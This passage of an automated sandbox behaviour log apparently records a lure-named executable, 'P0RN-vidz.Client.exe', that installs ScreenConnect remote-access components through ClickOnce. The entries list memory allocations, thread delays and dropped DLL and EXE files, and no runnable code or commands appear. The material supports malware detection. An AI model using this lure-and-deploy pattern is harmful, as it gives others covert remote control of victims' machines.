                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 20C250B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 20C3EAE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeMemory allocated: 1210000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeMemory allocated: 1AFB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeMemory allocated: 1170000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeMemory allocated: 2C70000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeMemory allocated: 11D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeMemory allocated: 1D50000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeMemory allocated: 1FA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeMemory allocated: 1D50000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeMemory allocated: B90000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeMemory allocated: 1A6E0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599642Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599363Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598997Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598887Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598493Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598123Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597884Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597721Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597565Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596561Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595901Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595767Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595452Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595006Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594717Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594172Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592500Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 2173Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 7352Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..core_4b14c015c87c1ad8_0018.0004_none_53e91df7fcfd4a60\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..dows_4b14c015c87c1ad8_0018.0004_none_5860f5d9394b5d90\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..vice_4b14c015c87c1ad8_0018.0004_none_053cb64092bcadcb\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9fe7bca0c4ca064\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exe TID: 6496Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -599891s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -599766s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -599642s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -599516s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -599363s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -599234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -599125s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -598997s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -598887s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -598625s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -598493s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -598123s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -597884s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -597721s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -597565s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -597437s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -597328s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -597219s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -597109s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -597000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -596890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -596781s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -596672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -596561s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -596453s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -596344s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -596234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -596125s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -596015s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -595901s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -595767s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -595625s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -595452s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -595281s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -595006s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -594844s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -594717s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -594609s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -594500s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -594390s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -594281s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -594172s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -594047s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -593937s >= -30000sJump to behavior
